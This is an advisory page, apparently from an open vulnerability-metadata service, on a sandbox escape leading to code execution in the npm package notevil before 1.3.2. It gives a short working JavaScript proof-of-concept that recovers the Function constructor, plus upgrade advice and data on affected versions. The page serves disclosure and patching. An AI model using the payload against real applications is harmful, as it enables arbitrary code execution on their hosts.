Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTdyNWYtN3FyNC1wZjZx

Sandbox Breakout / Arbitrary Code Execution in notevil

Versions of notevil prior to 1.3.2 are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to prevent access to the Function constructor by not checking the return values of function calls. This allows attackers to access the Function prototype's constructor leading to the Sandbox Escape. An example payload is:

var safeEval = require('notevil')
var input = "" + 
"function fn() {};" + 
"var constructorProperty = Object.getOwnPropertyDescriptors(fn.__proto__).constructor;" + 
"var properties = Object.values(constructorProperty);" + 
"properties.pop();" + 
"properties.pop();" + 
"properties.pop();" + 
"var Function = properties.pop();" + 
"(Function('return this'))()"; 
safeEval(input)```


## Recommendation

Upgrade to version 1.3.2 or later.

Permalink: https://github.com/advisories/GHSA-7r5f-7qr4-pf6q
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTdyNWYtN3FyNC1wZjZx
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: over 3 years ago
Updated: over 1 year ago

Identifiers: GHSA-7r5f-7qr4-pf6q
References:

Blast Radius: 0.0

Affected Packages

npm:notevil

Dependent packages: 32
Dependent repositories: 1,049
Downloads: 18,038 last month
Affected Version Ranges: < 1.3.2
Fixed in: 1.3.2
All affected versions: 0.0.0, 0.0.1, 0.0.2, 0.1.0, 0.2.0, 0.3.0, 0.4.0, 0.5.0, 0.6.0, 0.7.0, 0.8.0, 0.8.1, 1.0.0, 1.1.0, 1.2.0, 1.3.0, 1.3.1
All unaffected versions: 1.3.2, 1.3.3